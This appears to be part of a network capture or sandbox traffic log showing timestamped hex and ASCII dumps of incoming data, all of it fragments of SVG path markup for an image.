                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC3878INData Raw: 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 37 36 2e 39 33 2c 31 32 34 2e 34 32 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 37 37 2e 31 36 2c 31 33 31 2e 32 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34
                                                                                                                                                                                                                                                                          Data Ascii: .08,0,0,1-.15-2.81"></path><path class="cls-4" d="M976.93,124.42a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.38,2.38,0,0,1-.51,2.85,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M977.16,131.24a1.7,1.7,0,0,1,.77-2.2,2.4
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC3894INData Raw: 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 39 2e 38 32 2c 32 33 34 2e 33 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                                          Data Ascii: -.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M959.82,234.37a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC3910INData Raw: 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 39 2e 33 2c 31 35 33 2e 33 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c
                                                                                                                                                                                                                                                                          Data Ascii: ,1,3.29.93,2.37,2.37,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"></path><path class="cls-4" d="M929.3,153.37a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"></path><
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC3926INData Raw: 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 32 2e 31 38 2c 32 36 33 2e 33 33 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 31 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: 2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M912.18,263.33a1.71,1.71,0,0,1,.77-2.21,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC3942INData Raw: 4d 38 38 31 2e 34 33 2c 31 37 35 2e 35 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 38 31 2e 36 36 2c 31 38 32 2e 33 33 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c
                                                                                                                                                                                                                                                                          Data Ascii: M881.43,175.5a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"></path><path class="cls-4" d="M881.66,182.33a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC3958INData Raw: 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 36 34 2e 33 31 2c 32 38 35 2e 34 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 36 34 2e 35 34 2c 32 39 32 2e 32 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33
                                                                                                                                                                                                                                                                          Data Ascii: </path><path class="cls-4" d="M864.31,285.45a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"></path><path class="cls-4" d="M864.54,292.28a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC3974INData Raw: 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 33 2e 37 39 2c 32 30 34 2e 34 36 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 31 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 34 2c 32 31 31 2e 32 38 61 31 2e 37 2c 31 2e 37 2c
                                                                                                                                                                                                                                                                          Data Ascii: 0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M833.79,204.46a1.71,1.71,0,0,1,.77-2.21,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M834,211.28a1.7,1.7,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC3990INData Raw: 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 33 2e 32 37 2c 31 32 33 2e 34 36 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38
                                                                                                                                                                                                                                                                          Data Ascii: 0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"></path><path class="cls-4" d="M803.27,123.46a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"></path><path class="cls-4" d="M8
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4006INData Raw: 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 36 2e 31 35 2c 32 33 33 2e 34 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68
                                                                                                                                                                                                                                                                          Data Ascii: 9.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"></path><path class="cls-4" d="M786.15,233.41a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.82"></path><path
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4022INData Raw: 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 32 2c 32 36 37 2e 33 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 31 2e 37 31 2c 32 35 39 2e 35 38 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: h class="cls-7" d="M522,267.3a1.91,1.91,0,0,1-.87,2.48,2.81,2.81,0,0,1-3.72-1,2.69,2.69,0,0,1,.57-3.22,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path class="cls-7" d="M521.71,259.58a1.91,1.91,0,0,1-.86,2.49,2.81,2.81,0,0,1-3.72-1.05,2.68,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4038INData Raw: 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 34 31 2e 35 38 2c 31 35 30 2e 37 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63
                                                                                                                                                                                                                                                                          Data Ascii: 2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M541.58,150.76a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.69,2.69,0,0,1,.56-3.22,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path c
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4054INData Raw: 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 37 36 2e 35 39 2c 32 35 37 2e 37 32 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 37 36 2e 33 33 2c 32 35 30 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                                          Data Ascii: 8,3.17"></path><path class="cls-7" d="M576.59,257.72a1.91,1.91,0,0,1-.86,2.49,2.8,2.8,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.18"></path><path class="cls-7" d="M576.33,250a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4070INData Raw: 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 36 2e 32 2c 31 34 31 2e 31 38 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20
                                                                                                                                                                                                                                                                          Data Ascii: 1,2.69,2.69,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M596.2,141.18a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4086INData Raw: 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 33 31 2e 32 31 2c 32 34 38 2e 31 35 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 33 31 2c 32 34 30 2e 34 33 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: lass="cls-7" d="M631.21,248.15a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17"></path><path class="cls-7" d="M631,240.43a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.67,2.67,0,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4102INData Raw: 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 35 30 2e 38 31 2c 31 33 31 2e 36 31 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63
                                                                                                                                                                                                                                                                          Data Ascii: .05,2.68,2.68,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.18"></path><path class="cls-7" d="M650.81,131.61a1.92,1.92,0,0,1-.86,2.49,2.8,2.8,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.34,2.34,0,0,1,.18,3.17"></path><path c
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4118INData Raw: 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 38 35 2e 38 33 2c 32 33 38 2e 35 38 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 38 35 2e 35 37 2c 32 33 30 2e 38 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: <path class="cls-7" d="M685.83,238.58a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.69,2.69,0,0,1,.56-3.22,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M685.57,230.86a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4134INData Raw: 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 30 35 2e 34 33 2c 31 32 32 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73
                                                                                                                                                                                                                                                                          Data Ascii: .66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"></path><path class="cls-7" d="M705.43,122a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"></path><path class
